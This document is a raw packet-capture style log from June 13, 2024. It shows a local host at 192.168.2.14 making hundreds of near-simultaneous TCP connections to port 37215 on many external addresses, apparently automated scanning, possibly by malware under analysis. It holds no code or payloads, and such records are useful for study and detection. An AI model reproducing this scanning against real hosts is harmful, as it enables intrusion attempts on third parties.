                                                        Jun 13, 2024 21:32:01.368418932 CEST3721534850156.170.23.95192.168.2.14
                                                        Jun 13, 2024 21:32:01.368432999 CEST4114637215192.168.2.14197.198.3.212
                                                        Jun 13, 2024 21:32:01.368447065 CEST5970437215192.168.2.14156.85.226.254
                                                        Jun 13, 2024 21:32:01.368452072 CEST3485037215192.168.2.14156.170.23.95
                                                        Jun 13, 2024 21:32:01.368585110 CEST3721535962197.205.207.178192.168.2.14
                                                        Jun 13, 2024 21:32:01.368622065 CEST3596237215192.168.2.14197.205.207.178
                                                        Jun 13, 2024 21:32:01.368784904 CEST3721549762156.221.199.41192.168.2.14
                                                        Jun 13, 2024 21:32:01.368822098 CEST4976237215192.168.2.14156.221.199.41
                                                        Jun 13, 2024 21:32:01.368915081 CEST3721558774156.36.253.113192.168.2.14
                                                        Jun 13, 2024 21:32:01.368953943 CEST5877437215192.168.2.14156.36.253.113
                                                        Jun 13, 2024 21:32:01.369041920 CEST372154291441.249.150.45192.168.2.14
                                                        Jun 13, 2024 21:32:01.369080067 CEST4291437215192.168.2.1441.249.150.45
                                                        Jun 13, 2024 21:32:01.369411945 CEST3721558724197.45.206.41192.168.2.14
                                                        Jun 13, 2024 21:32:01.369452000 CEST5872437215192.168.2.14197.45.206.41
                                                        Jun 13, 2024 21:32:01.369471073 CEST3721551762197.245.22.135192.168.2.14
                                                        Jun 13, 2024 21:32:01.369508982 CEST5176237215192.168.2.14197.245.22.135
                                                        Jun 13, 2024 21:32:01.369648933 CEST3721535176197.25.21.72192.168.2.14
                                                        Jun 13, 2024 21:32:01.369692087 CEST3517637215192.168.2.14197.25.21.72
                                                        Jun 13, 2024 21:32:01.369863987 CEST3721544200156.152.121.102192.168.2.14
                                                        Jun 13, 2024 21:32:01.369903088 CEST4420037215192.168.2.14156.152.121.102
                                                        Jun 13, 2024 21:32:01.370079994 CEST372156075641.73.13.140192.168.2.14
                                                        Jun 13, 2024 21:32:01.370119095 CEST6075637215192.168.2.1441.73.13.140
                                                        Jun 13, 2024 21:32:01.370282888 CEST3721556738156.0.64.228192.168.2.14
                                                        Jun 13, 2024 21:32:01.370320082 CEST5673837215192.168.2.14156.0.64.228
                                                        Jun 13, 2024 21:32:02.261179924 CEST1260337215192.168.2.14197.48.254.185
                                                        Jun 13, 2024 21:32:02.261199951 CEST1260337215192.168.2.14197.242.2.51
                                                        Jun 13, 2024 21:32:02.261200905 CEST1260337215192.168.2.14197.91.248.132
                                                        Jun 13, 2024 21:32:02.261200905 CEST1260337215192.168.2.1441.233.24.79
                                                        Jun 13, 2024 21:32:02.261205912 CEST1260337215192.168.2.14156.38.21.80
                                                        Jun 13, 2024 21:32:02.261212111 CEST1260337215192.168.2.14197.22.52.175
                                                        Jun 13, 2024 21:32:02.261207104 CEST1260337215192.168.2.1441.130.177.177
                                                        Jun 13, 2024 21:32:02.261212111 CEST1260337215192.168.2.1441.11.229.119
                                                        Jun 13, 2024 21:32:02.261213064 CEST1260337215192.168.2.1441.108.76.82
                                                        Jun 13, 2024 21:32:02.261214018 CEST1260337215192.168.2.14156.69.91.78
                                                        Jun 13, 2024 21:32:02.261214018 CEST1260337215192.168.2.14156.18.235.240
                                                        Jun 13, 2024 21:32:02.261234045 CEST1260337215192.168.2.14156.29.70.149
                                                        Jun 13, 2024 21:32:02.261234999 CEST1260337215192.168.2.1441.139.66.154
                                                        Jun 13, 2024 21:32:02.261234999 CEST1260337215192.168.2.14197.133.27.79
                                                        Jun 13, 2024 21:32:02.261244059 CEST1260337215192.168.2.14197.233.249.101
                                                        Jun 13, 2024 21:32:02.261246920 CEST1260337215192.168.2.14156.81.45.147
                                                        Jun 13, 2024 21:32:02.261264086 CEST1260337215192.168.2.14197.9.246.39
                                                        Jun 13, 2024 21:32:02.261265993 CEST1260337215192.168.2.14156.98.217.11
                                                        Jun 13, 2024 21:32:02.261267900 CEST1260337215192.168.2.14156.120.5.105
                                                        Jun 13, 2024 21:32:02.261267900 CEST1260337215192.168.2.1441.165.251.84
                                                        Jun 13, 2024 21:32:02.261267900 CEST1260337215192.168.2.14156.143.125.114
                                                        Jun 13, 2024 21:32:02.261280060 CEST1260337215192.168.2.14197.125.218.39
                                                        Jun 13, 2024 21:32:02.261281013 CEST1260337215192.168.2.14156.153.254.119
                                                        Jun 13, 2024 21:32:02.261281967 CEST1260337215192.168.2.14197.126.217.241
                                                        Jun 13, 2024 21:32:02.261281967 CEST1260337215192.168.2.14197.144.49.247
                                                        Jun 13, 2024 21:32:02.261285067 CEST1260337215192.168.2.1441.73.171.212
                                                        Jun 13, 2024 21:32:02.261287928 CEST1260337215192.168.2.14156.175.107.161
                                                        Jun 13, 2024 21:32:02.261297941 CEST1260337215192.168.2.14197.41.203.209
                                                        Jun 13, 2024 21:32:02.261297941 CEST1260337215192.168.2.1441.4.72.60
                                                        Jun 13, 2024 21:32:02.261298895 CEST1260337215192.168.2.14197.44.145.47
                                                        Jun 13, 2024 21:32:02.261297941 CEST1260337215192.168.2.14156.148.90.191
                                                        Jun 13, 2024 21:32:02.261298895 CEST1260337215192.168.2.14156.157.250.81
                                                        Jun 13, 2024 21:32:02.261298895 CEST1260337215192.168.2.14197.138.1.242
                                                        Jun 13, 2024 21:32:02.261301994 CEST1260337215192.168.2.1441.97.40.48
                                                        Jun 13, 2024 21:32:02.261310101 CEST1260337215192.168.2.14156.105.185.32
                                                        Jun 13, 2024 21:32:02.261310101 CEST1260337215192.168.2.14156.91.16.222
                                                        Jun 13, 2024 21:32:02.261310101 CEST1260337215192.168.2.14197.86.69.163
                                                        Jun 13, 2024 21:32:02.261310101 CEST1260337215192.168.2.1441.221.110.141
                                                        Jun 13, 2024 21:32:02.261317968 CEST1260337215192.168.2.1441.226.180.166
                                                        Jun 13, 2024 21:32:02.261320114 CEST1260337215192.168.2.1441.8.89.25
                                                        Jun 13, 2024 21:32:02.261324883 CEST1260337215192.168.2.1441.28.77.14
                                                        Jun 13, 2024 21:32:02.261332989 CEST1260337215192.168.2.14197.17.79.167
                                                        Jun 13, 2024 21:32:02.261337996 CEST1260337215192.168.2.14197.174.171.58
                                                        Jun 13, 2024 21:32:02.261339903 CEST1260337215192.168.2.14197.160.148.203
                                                        Jun 13, 2024 21:32:02.261344910 CEST1260337215192.168.2.14156.46.54.126
                                                        Jun 13, 2024 21:32:02.261346102 CEST1260337215192.168.2.14156.236.184.245
                                                        Jun 13, 2024 21:32:02.261354923 CEST1260337215192.168.2.14197.185.19.212
                                                        Jun 13, 2024 21:32:02.261368036 CEST1260337215192.168.2.1441.31.232.127
                                                        Jun 13, 2024 21:32:02.261373043 CEST1260337215192.168.2.14156.53.92.173
                                                        Jun 13, 2024 21:32:02.261373043 CEST1260337215192.168.2.1441.112.63.221
                                                        Jun 13, 2024 21:32:02.261377096 CEST1260337215192.168.2.1441.30.149.64
                                                        Jun 13, 2024 21:32:02.261377096 CEST1260337215192.168.2.1441.120.240.25
                                                        Jun 13, 2024 21:32:02.261390924 CEST1260337215192.168.2.14156.145.120.237
                                                        Jun 13, 2024 21:32:02.261390924 CEST1260337215192.168.2.14156.109.239.35
                                                        Jun 13, 2024 21:32:02.261393070 CEST1260337215192.168.2.14197.212.192.227
                                                        Jun 13, 2024 21:32:02.261400938 CEST1260337215192.168.2.14197.235.36.247
                                                        Jun 13, 2024 21:32:02.261405945 CEST1260337215192.168.2.14156.150.6.110
                                                        Jun 13, 2024 21:32:02.261411905 CEST1260337215192.168.2.14156.200.130.213
                                                        Jun 13, 2024 21:32:02.261421919 CEST1260337215192.168.2.14156.85.224.246
                                                        Jun 13, 2024 21:32:02.261425018 CEST1260337215192.168.2.14197.136.2.96
                                                        Jun 13, 2024 21:32:02.261425018 CEST1260337215192.168.2.14156.224.73.220
                                                        Jun 13, 2024 21:32:02.261430979 CEST1260337215192.168.2.1441.34.96.28
                                                        Jun 13, 2024 21:32:02.261439085 CEST1260337215192.168.2.14156.51.40.232
                                                        Jun 13, 2024 21:32:02.261439085 CEST1260337215192.168.2.14156.75.42.168
                                                        Jun 13, 2024 21:32:02.261439085 CEST1260337215192.168.2.14197.118.96.81
                                                        Jun 13, 2024 21:32:02.261440992 CEST1260337215192.168.2.14197.238.194.238
                                                        Jun 13, 2024 21:32:02.261446953 CEST1260337215192.168.2.14156.135.255.113
                                                        Jun 13, 2024 21:32:02.261451960 CEST1260337215192.168.2.14156.252.194.48
                                                        Jun 13, 2024 21:32:02.261454105 CEST1260337215192.168.2.14156.15.119.11
                                                        Jun 13, 2024 21:32:02.261454105 CEST1260337215192.168.2.14156.100.103.80
                                                        Jun 13, 2024 21:32:02.261454105 CEST1260337215192.168.2.14156.2.71.33
                                                        Jun 13, 2024 21:32:02.261461020 CEST1260337215192.168.2.14156.38.59.86
                                                        Jun 13, 2024 21:32:02.261467934 CEST1260337215192.168.2.14197.163.2.0
                                                        Jun 13, 2024 21:32:02.261476040 CEST1260337215192.168.2.14197.245.198.17
                                                        Jun 13, 2024 21:32:02.261487961 CEST1260337215192.168.2.14156.13.239.178
                                                        Jun 13, 2024 21:32:02.261492014 CEST1260337215192.168.2.1441.142.34.29
                                                        Jun 13, 2024 21:32:02.261492014 CEST1260337215192.168.2.14197.137.20.236
                                                        Jun 13, 2024 21:32:02.261493921 CEST1260337215192.168.2.1441.49.50.178
                                                        Jun 13, 2024 21:32:02.261493921 CEST1260337215192.168.2.14156.40.255.202
                                                        Jun 13, 2024 21:32:02.261499882 CEST1260337215192.168.2.14156.107.211.96
                                                        Jun 13, 2024 21:32:02.261501074 CEST1260337215192.168.2.14197.248.245.187
                                                        Jun 13, 2024 21:32:02.261499882 CEST1260337215192.168.2.14156.98.126.146
                                                        Jun 13, 2024 21:32:02.261514902 CEST1260337215192.168.2.14156.184.236.36
                                                        Jun 13, 2024 21:32:02.261517048 CEST1260337215192.168.2.1441.177.114.51
                                                        Jun 13, 2024 21:32:02.261518002 CEST1260337215192.168.2.14197.11.150.37
                                                        Jun 13, 2024 21:32:02.261518002 CEST1260337215192.168.2.14197.98.113.18
                                                        Jun 13, 2024 21:32:02.261529922 CEST1260337215192.168.2.14156.73.112.15
                                                        Jun 13, 2024 21:32:02.261531115 CEST1260337215192.168.2.14156.52.1.101
                                                        Jun 13, 2024 21:32:02.261531115 CEST1260337215192.168.2.14197.146.168.47
                                                        Jun 13, 2024 21:32:02.261537075 CEST1260337215192.168.2.1441.228.70.82
                                                        Jun 13, 2024 21:32:02.261552095 CEST1260337215192.168.2.14197.194.155.30
                                                        Jun 13, 2024 21:32:02.261552095 CEST1260337215192.168.2.1441.116.69.21
                                                        Jun 13, 2024 21:32:02.261553049 CEST1260337215192.168.2.14197.212.212.239
                                                        Jun 13, 2024 21:32:02.261553049 CEST1260337215192.168.2.14197.35.140.134
                                                        Jun 13, 2024 21:32:02.261564016 CEST1260337215192.168.2.1441.208.140.157
                                                        Jun 13, 2024 21:32:02.261571884 CEST1260337215192.168.2.1441.38.56.45
                                                        Jun 13, 2024 21:32:02.261574984 CEST1260337215192.168.2.14156.178.110.31
                                                        Jun 13, 2024 21:32:02.261584997 CEST1260337215192.168.2.14197.205.249.150
                                                        Jun 13, 2024 21:32:02.261586905 CEST1260337215192.168.2.14156.36.62.71
                                                        Jun 13, 2024 21:32:02.261589050 CEST1260337215192.168.2.14197.211.1.204
                                                        Jun 13, 2024 21:32:02.261596918 CEST1260337215192.168.2.14156.85.29.213
                                                        Jun 13, 2024 21:32:02.261600971 CEST1260337215192.168.2.14197.39.167.206
                                                        Jun 13, 2024 21:32:02.261610031 CEST1260337215192.168.2.14197.207.174.181
                                                        Jun 13, 2024 21:32:02.261611938 CEST1260337215192.168.2.14156.170.35.32
                                                        Jun 13, 2024 21:32:02.261619091 CEST1260337215192.168.2.14156.217.252.15
                                                        Jun 13, 2024 21:32:02.261619091 CEST1260337215192.168.2.14156.22.15.149
                                                        Jun 13, 2024 21:32:02.261629105 CEST1260337215192.168.2.1441.46.40.162
                                                        Jun 13, 2024 21:32:02.261630058 CEST1260337215192.168.2.14197.100.45.9
                                                        Jun 13, 2024 21:32:02.261639118 CEST1260337215192.168.2.14156.66.84.142
                                                        Jun 13, 2024 21:32:02.261645079 CEST1260337215192.168.2.14156.71.135.100
                                                        Jun 13, 2024 21:32:02.261651993 CEST1260337215192.168.2.1441.222.216.67
                                                        Jun 13, 2024 21:32:02.261657000 CEST1260337215192.168.2.1441.222.186.62
                                                        Jun 13, 2024 21:32:02.261657000 CEST1260337215192.168.2.14197.69.68.79
                                                        Jun 13, 2024 21:32:02.261667967 CEST1260337215192.168.2.14197.21.174.146
                                                        Jun 13, 2024 21:32:02.261667967 CEST1260337215192.168.2.1441.243.166.99
                                                        Jun 13, 2024 21:32:02.261667967 CEST1260337215192.168.2.1441.153.95.121
                                                        Jun 13, 2024 21:32:02.261678934 CEST1260337215192.168.2.14197.110.122.85
                                                        Jun 13, 2024 21:32:02.261678934 CEST1260337215192.168.2.14197.183.92.21
                                                        Jun 13, 2024 21:32:02.261681080 CEST1260337215192.168.2.14156.104.85.254
                                                        Jun 13, 2024 21:32:02.261689901 CEST1260337215192.168.2.14156.134.246.13
                                                        Jun 13, 2024 21:32:02.261691093 CEST1260337215192.168.2.14197.40.126.172
                                                        Jun 13, 2024 21:32:02.261692047 CEST1260337215192.168.2.14156.67.134.124
                                                        Jun 13, 2024 21:32:02.261692047 CEST1260337215192.168.2.1441.3.16.29
                                                        Jun 13, 2024 21:32:02.261703968 CEST1260337215192.168.2.1441.76.31.108
                                                        Jun 13, 2024 21:32:02.261713028 CEST1260337215192.168.2.14197.93.242.33
                                                        Jun 13, 2024 21:32:02.261718035 CEST1260337215192.168.2.14156.224.187.4
                                                        Jun 13, 2024 21:32:02.261718035 CEST1260337215192.168.2.14197.158.144.70
                                                        Jun 13, 2024 21:32:02.261720896 CEST1260337215192.168.2.1441.117.110.130
                                                        Jun 13, 2024 21:32:02.261722088 CEST1260337215192.168.2.14197.92.14.153
                                                        Jun 13, 2024 21:32:02.261727095 CEST1260337215192.168.2.14156.159.241.121
                                                        Jun 13, 2024 21:32:02.261730909 CEST1260337215192.168.2.14156.95.255.229
                                                        Jun 13, 2024 21:32:02.261730909 CEST1260337215192.168.2.14156.16.183.54
                                                        Jun 13, 2024 21:32:02.261740923 CEST1260337215192.168.2.1441.165.31.144
                                                        Jun 13, 2024 21:32:02.261744976 CEST1260337215192.168.2.14197.175.71.72
                                                        Jun 13, 2024 21:32:02.261744976 CEST1260337215192.168.2.14197.114.17.27
                                                        Jun 13, 2024 21:32:02.261749029 CEST1260337215192.168.2.1441.116.81.92
                                                        Jun 13, 2024 21:32:02.261763096 CEST1260337215192.168.2.1441.231.104.109
                                                        Jun 13, 2024 21:32:02.261768103 CEST1260337215192.168.2.1441.149.133.0
                                                        Jun 13, 2024 21:32:02.261769056 CEST1260337215192.168.2.1441.249.78.118
                                                        Jun 13, 2024 21:32:02.261774063 CEST1260337215192.168.2.14197.49.63.77
                                                        Jun 13, 2024 21:32:02.261780977 CEST1260337215192.168.2.1441.200.26.96
                                                        Jun 13, 2024 21:32:02.261780977 CEST1260337215192.168.2.14156.142.36.160
                                                        Jun 13, 2024 21:32:02.261780977 CEST1260337215192.168.2.14156.196.212.117
                                                        Jun 13, 2024 21:32:02.261780977 CEST1260337215192.168.2.14156.20.103.50
                                                        Jun 13, 2024 21:32:02.261780977 CEST1260337215192.168.2.14197.3.203.156
                                                        Jun 13, 2024 21:32:02.261792898 CEST1260337215192.168.2.14197.128.125.18
                                                        Jun 13, 2024 21:32:02.261792898 CEST1260337215192.168.2.14197.228.216.171
                                                        Jun 13, 2024 21:32:02.261795998 CEST1260337215192.168.2.14156.202.193.218
                                                        Jun 13, 2024 21:32:02.261792898 CEST1260337215192.168.2.1441.195.86.181
                                                        Jun 13, 2024 21:32:02.261795998 CEST1260337215192.168.2.1441.166.110.190
                                                        Jun 13, 2024 21:32:02.261795998 CEST1260337215192.168.2.14197.246.186.62
                                                        Jun 13, 2024 21:32:02.261797905 CEST1260337215192.168.2.1441.211.167.205
                                                        Jun 13, 2024 21:32:02.261797905 CEST1260337215192.168.2.14156.42.162.143
                                                        Jun 13, 2024 21:32:02.261801004 CEST1260337215192.168.2.1441.160.163.109
                                                        Jun 13, 2024 21:32:02.261801958 CEST1260337215192.168.2.14197.213.58.236
                                                        Jun 13, 2024 21:32:02.261815071 CEST1260337215192.168.2.14156.74.75.0
                                                        Jun 13, 2024 21:32:02.261823893 CEST1260337215192.168.2.1441.221.133.250
                                                        Jun 13, 2024 21:32:02.261823893 CEST1260337215192.168.2.1441.205.52.20
                                                        Jun 13, 2024 21:32:02.261835098 CEST1260337215192.168.2.1441.223.127.19
                                                        Jun 13, 2024 21:32:02.261835098 CEST1260337215192.168.2.14197.147.247.78
                                                        Jun 13, 2024 21:32:02.267606020 CEST3721512603197.48.254.185192.168.2.14
                                                        Jun 13, 2024 21:32:02.267621040 CEST3721512603197.242.2.51192.168.2.14
                                                        Jun 13, 2024 21:32:02.267635107 CEST3721512603197.91.248.132192.168.2.14
                                                        Jun 13, 2024 21:32:02.267647982 CEST372151260341.233.24.79192.168.2.14
                                                        Jun 13, 2024 21:32:02.267661095 CEST3721512603197.22.52.175192.168.2.14
                                                        Jun 13, 2024 21:32:02.267672062 CEST1260337215192.168.2.14197.48.254.185
                                                        Jun 13, 2024 21:32:02.267673969 CEST372151260341.108.76.82192.168.2.14
                                                        Jun 13, 2024 21:32:02.267677069 CEST1260337215192.168.2.14197.242.2.51
                                                        Jun 13, 2024 21:32:02.267683029 CEST1260337215192.168.2.14197.91.248.132
                                                        Jun 13, 2024 21:32:02.267683029 CEST1260337215192.168.2.1441.233.24.79
                                                        Jun 13, 2024 21:32:02.267689943 CEST3721512603156.69.91.78192.168.2.14
                                                        Jun 13, 2024 21:32:02.267692089 CEST1260337215192.168.2.14197.22.52.175
                                                        Jun 13, 2024 21:32:02.267714024 CEST372151260341.11.229.119192.168.2.14
                                                        Jun 13, 2024 21:32:02.267728090 CEST3721512603156.18.235.240192.168.2.14
                                                        Jun 13, 2024 21:32:02.267729044 CEST1260337215192.168.2.14156.69.91.78
                                                        Jun 13, 2024 21:32:02.267731905 CEST1260337215192.168.2.1441.108.76.82
                                                        Jun 13, 2024 21:32:02.267740965 CEST372151260341.139.66.154192.168.2.14
                                                        Jun 13, 2024 21:32:02.267752886 CEST1260337215192.168.2.1441.11.229.119
                                                        Jun 13, 2024 21:32:02.267754078 CEST3721512603156.29.70.149192.168.2.14
                                                        Jun 13, 2024 21:32:02.267766953 CEST1260337215192.168.2.14156.18.235.240
                                                        Jun 13, 2024 21:32:02.267766953 CEST1260337215192.168.2.1441.139.66.154
                                                        Jun 13, 2024 21:32:02.267769098 CEST3721512603197.133.27.79192.168.2.14
                                                        Jun 13, 2024 21:32:02.267792940 CEST1260337215192.168.2.14156.29.70.149
                                                        Jun 13, 2024 21:32:02.267798901 CEST1260337215192.168.2.14197.133.27.79
                                                        Jun 13, 2024 21:32:02.267805099 CEST3721512603156.38.21.80192.168.2.14
                                                        Jun 13, 2024 21:32:02.267839909 CEST1260337215192.168.2.14156.38.21.80
                                                        Jun 13, 2024 21:32:02.267870903 CEST372151260341.130.177.177192.168.2.14
                                                        Jun 13, 2024 21:32:02.267884016 CEST3721512603197.233.249.101192.168.2.14
                                                        Jun 13, 2024 21:32:02.267910004 CEST3721512603156.81.45.147192.168.2.14
                                                        Jun 13, 2024 21:32:02.267910957 CEST1260337215192.168.2.1441.130.177.177
                                                        Jun 13, 2024 21:32:02.267915010 CEST1260337215192.168.2.14197.233.249.101
                                                        Jun 13, 2024 21:32:02.267924070 CEST3721512603197.9.246.39192.168.2.14
                                                        Jun 13, 2024 21:32:02.267936945 CEST3721512603156.98.217.11192.168.2.14
                                                        Jun 13, 2024 21:32:02.267942905 CEST1260337215192.168.2.14156.81.45.147
                                                        Jun 13, 2024 21:32:02.267951965 CEST3721512603156.120.5.105192.168.2.14
                                                        Jun 13, 2024 21:32:02.267957926 CEST1260337215192.168.2.14197.9.246.39
                                                        Jun 13, 2024 21:32:02.267966032 CEST3721512603156.143.125.114192.168.2.14
                                                        Jun 13, 2024 21:32:02.267971039 CEST1260337215192.168.2.14156.98.217.11
                                                        Jun 13, 2024 21:32:02.267980099 CEST372151260341.165.251.84192.168.2.14
                                                        Jun 13, 2024 21:32:02.267986059 CEST1260337215192.168.2.14156.120.5.105
                                                        Jun 13, 2024 21:32:02.267992973 CEST3721512603197.125.218.39192.168.2.14
                                                        Jun 13, 2024 21:32:02.268004894 CEST1260337215192.168.2.14156.143.125.114
                                                        Jun 13, 2024 21:32:02.268007040 CEST3721512603156.153.254.119192.168.2.14
                                                        Jun 13, 2024 21:32:02.268012047 CEST1260337215192.168.2.1441.165.251.84
                                                        Jun 13, 2024 21:32:02.268021107 CEST3721512603197.126.217.241192.168.2.14
                                                        Jun 13, 2024 21:32:02.268028975 CEST1260337215192.168.2.14197.125.218.39
                                                        Jun 13, 2024 21:32:02.268033981 CEST372151260341.73.171.212192.168.2.14
                                                        Jun 13, 2024 21:32:02.268038988 CEST1260337215192.168.2.14156.153.254.119
                                                        Jun 13, 2024 21:32:02.268047094 CEST3721512603156.175.107.161192.168.2.14
                                                        Jun 13, 2024 21:32:02.268053055 CEST1260337215192.168.2.14197.126.217.241
                                                        Jun 13, 2024 21:32:02.268060923 CEST3721512603197.144.49.247192.168.2.14
                                                        Jun 13, 2024 21:32:02.268066883 CEST1260337215192.168.2.1441.73.171.212
                                                        Jun 13, 2024 21:32:02.268074036 CEST3721512603197.44.145.47192.168.2.14
                                                        Jun 13, 2024 21:32:02.268076897 CEST1260337215192.168.2.14156.175.107.161
                                                        Jun 13, 2024 21:32:02.268088102 CEST3721512603156.157.250.81192.168.2.14
                                                        Jun 13, 2024 21:32:02.268099070 CEST1260337215192.168.2.14197.144.49.247
                                                        Jun 13, 2024 21:32:02.268100977 CEST372151260341.97.40.48192.168.2.14
                                                        Jun 13, 2024 21:32:02.268102884 CEST1260337215192.168.2.14197.44.145.47
                                                        Jun 13, 2024 21:32:02.268120050 CEST1260337215192.168.2.14156.157.250.81
                                                        Jun 13, 2024 21:32:02.268156052 CEST3721512603197.41.203.209192.168.2.14
                                                        Jun 13, 2024 21:32:02.268170118 CEST372151260341.4.72.60192.168.2.14
                                                        Jun 13, 2024 21:32:02.268177032 CEST1260337215192.168.2.1441.97.40.48
                                                        Jun 13, 2024 21:32:02.268182993 CEST3721512603156.148.90.191192.168.2.14
                                                        Jun 13, 2024 21:32:02.268192053 CEST1260337215192.168.2.14197.41.203.209
                                                        Jun 13, 2024 21:32:02.268192053 CEST1260337215192.168.2.1441.4.72.60
                                                        Jun 13, 2024 21:32:02.268197060 CEST3721512603197.138.1.242192.168.2.14
                                                        Jun 13, 2024 21:32:02.268209934 CEST372151260341.226.180.166192.168.2.14
                                                        Jun 13, 2024 21:32:02.268217087 CEST1260337215192.168.2.14156.148.90.191
                                                        Jun 13, 2024 21:32:02.268223047 CEST372151260341.8.89.25192.168.2.14
                                                        Jun 13, 2024 21:32:02.268229008 CEST1260337215192.168.2.14197.138.1.242
                                                        Jun 13, 2024 21:32:02.268234968 CEST1260337215192.168.2.1441.226.180.166
                                                        Jun 13, 2024 21:32:02.268237114 CEST3721512603156.105.185.32192.168.2.14
                                                        Jun 13, 2024 21:32:02.268259048 CEST1260337215192.168.2.1441.8.89.25
                                                        Jun 13, 2024 21:32:02.268265009 CEST1260337215192.168.2.14156.105.185.32
                                                        Jun 13, 2024 21:32:02.282490015 CEST3721512603156.91.16.222192.168.2.14
                                                        Jun 13, 2024 21:32:02.282505989 CEST3721512603197.86.69.163192.168.2.14
                                                        Jun 13, 2024 21:32:02.282520056 CEST372151260341.221.110.141192.168.2.14
                                                        Jun 13, 2024 21:32:02.282546997 CEST1260337215192.168.2.14197.86.69.163
                                                        Jun 13, 2024 21:32:02.282546997 CEST1260337215192.168.2.14156.91.16.222
                                                        Jun 13, 2024 21:32:02.282546997 CEST1260337215192.168.2.1441.221.110.141
                                                        Jun 13, 2024 21:32:02.283122063 CEST372151260341.28.77.14192.168.2.14
                                                        Jun 13, 2024 21:32:02.283137083 CEST3721512603197.17.79.167192.168.2.14
                                                        Jun 13, 2024 21:32:02.283150911 CEST3721512603197.174.171.58192.168.2.14
                                                        Jun 13, 2024 21:32:02.283162117 CEST1260337215192.168.2.1441.28.77.14
                                                        Jun 13, 2024 21:32:02.283174992 CEST1260337215192.168.2.14197.17.79.167
                                                        Jun 13, 2024 21:32:02.283176899 CEST3721512603197.160.148.203192.168.2.14
                                                        Jun 13, 2024 21:32:02.283185959 CEST1260337215192.168.2.14197.174.171.58
                                                        Jun 13, 2024 21:32:02.283191919 CEST3721512603156.46.54.126192.168.2.14
                                                        Jun 13, 2024 21:32:02.283205032 CEST3721512603156.236.184.245192.168.2.14
                                                        Jun 13, 2024 21:32:02.283219099 CEST3721512603197.185.19.212192.168.2.14
                                                        Jun 13, 2024 21:32:02.283221006 CEST1260337215192.168.2.14197.160.148.203
                                                        Jun 13, 2024 21:32:02.283231020 CEST372151260341.31.232.127192.168.2.14
                                                        Jun 13, 2024 21:32:02.283232927 CEST1260337215192.168.2.14156.46.54.126
                                                        Jun 13, 2024 21:32:02.283232927 CEST1260337215192.168.2.14156.236.184.245
                                                        Jun 13, 2024 21:32:02.283243895 CEST3721512603156.53.92.173192.168.2.14
                                                        Jun 13, 2024 21:32:02.283246040 CEST1260337215192.168.2.14197.185.19.212
                                                        Jun 13, 2024 21:32:02.283257961 CEST372151260341.112.63.221192.168.2.14
                                                        Jun 13, 2024 21:32:02.283268929 CEST1260337215192.168.2.1441.31.232.127
                                                        Jun 13, 2024 21:32:02.283272028 CEST372151260341.30.149.64192.168.2.14
                                                        Jun 13, 2024 21:32:02.283272982 CEST1260337215192.168.2.14156.53.92.173
                                                        Jun 13, 2024 21:32:02.283286095 CEST372151260341.120.240.25192.168.2.14
                                                        Jun 13, 2024 21:32:02.283294916 CEST1260337215192.168.2.1441.112.63.221
                                                        Jun 13, 2024 21:32:02.283299923 CEST3721512603197.212.192.227192.168.2.14
                                                        Jun 13, 2024 21:32:02.283305883 CEST1260337215192.168.2.1441.30.149.64
                                                        Jun 13, 2024 21:32:02.283313036 CEST3721512603156.145.120.237192.168.2.14
                                                        Jun 13, 2024 21:32:02.283325911 CEST1260337215192.168.2.1441.120.240.25
                                                        Jun 13, 2024 21:32:02.283327103 CEST3721512603156.109.239.35192.168.2.14
                                                        Jun 13, 2024 21:32:02.283330917 CEST1260337215192.168.2.14197.212.192.227
                                                        Jun 13, 2024 21:32:02.283341885 CEST3721512603197.235.36.247192.168.2.14
                                                        Jun 13, 2024 21:32:02.283349037 CEST1260337215192.168.2.14156.145.120.237
                                                        Jun 13, 2024 21:32:02.283354998 CEST3721512603156.150.6.110192.168.2.14
                                                        Jun 13, 2024 21:32:02.283355951 CEST1260337215192.168.2.14156.109.239.35
                                                        Jun 13, 2024 21:32:02.283368111 CEST3721512603156.200.130.213192.168.2.14
                                                        Jun 13, 2024 21:32:02.283379078 CEST1260337215192.168.2.14197.235.36.247
                                                        Jun 13, 2024 21:32:02.283380032 CEST3721512603156.85.224.246192.168.2.14
                                                        Jun 13, 2024 21:32:02.283384085 CEST1260337215192.168.2.14156.150.6.110
                                                        Jun 13, 2024 21:32:02.283395052 CEST3721512603197.136.2.96192.168.2.14
                                                        Jun 13, 2024 21:32:02.283406973 CEST1260337215192.168.2.14156.200.130.213
                                                        Jun 13, 2024 21:32:02.283407927 CEST3721512603156.224.73.220192.168.2.14
                                                        Jun 13, 2024 21:32:02.283410072 CEST1260337215192.168.2.14156.85.224.246
                                                        Jun 13, 2024 21:32:02.283421040 CEST372151260341.34.96.28192.168.2.14
                                                        Jun 13, 2024 21:32:02.283427000 CEST1260337215192.168.2.14197.136.2.96
                                                        Jun 13, 2024 21:32:02.283433914 CEST3721512603156.51.40.232192.168.2.14
                                                        Jun 13, 2024 21:32:02.283435106 CEST1260337215192.168.2.14156.224.73.220
                                                        Jun 13, 2024 21:32:02.283447027 CEST3721512603197.238.194.238192.168.2.14
                                                        Jun 13, 2024 21:32:02.283451080 CEST1260337215192.168.2.1441.34.96.28
                                                        Jun 13, 2024 21:32:02.283459902 CEST3721512603156.75.42.168192.168.2.14
                                                        Jun 13, 2024 21:32:02.283467054 CEST1260337215192.168.2.14156.51.40.232
                                                        Jun 13, 2024 21:32:02.283483982 CEST1260337215192.168.2.14197.238.194.238
                                                        Jun 13, 2024 21:32:02.283492088 CEST1260337215192.168.2.14156.75.42.168
                                                        Jun 13, 2024 21:32:02.283734083 CEST3721512603197.118.96.81192.168.2.14
                                                        Jun 13, 2024 21:32:02.283752918 CEST3721512603156.135.255.113192.168.2.14
                                                        Jun 13, 2024 21:32:02.283766031 CEST3721512603156.252.194.48192.168.2.14
                                                        Jun 13, 2024 21:32:02.283778906 CEST3721512603156.15.119.11192.168.2.14
                                                        Jun 13, 2024 21:32:02.283782005 CEST1260337215192.168.2.14156.135.255.113
                                                        Jun 13, 2024 21:32:02.283782959 CEST1260337215192.168.2.14197.118.96.81
                                                        Jun 13, 2024 21:32:02.283792019 CEST3721512603156.100.103.80192.168.2.14
                                                        Jun 13, 2024 21:32:02.283804893 CEST3721512603156.38.59.86192.168.2.14
                                                        Jun 13, 2024 21:32:02.283806086 CEST1260337215192.168.2.14156.252.194.48
                                                        Jun 13, 2024 21:32:02.283809900 CEST1260337215192.168.2.14156.15.119.11
                                                        Jun 13, 2024 21:32:02.283818007 CEST3721512603156.2.71.33192.168.2.14
                                                        Jun 13, 2024 21:32:02.283823013 CEST1260337215192.168.2.14156.100.103.80
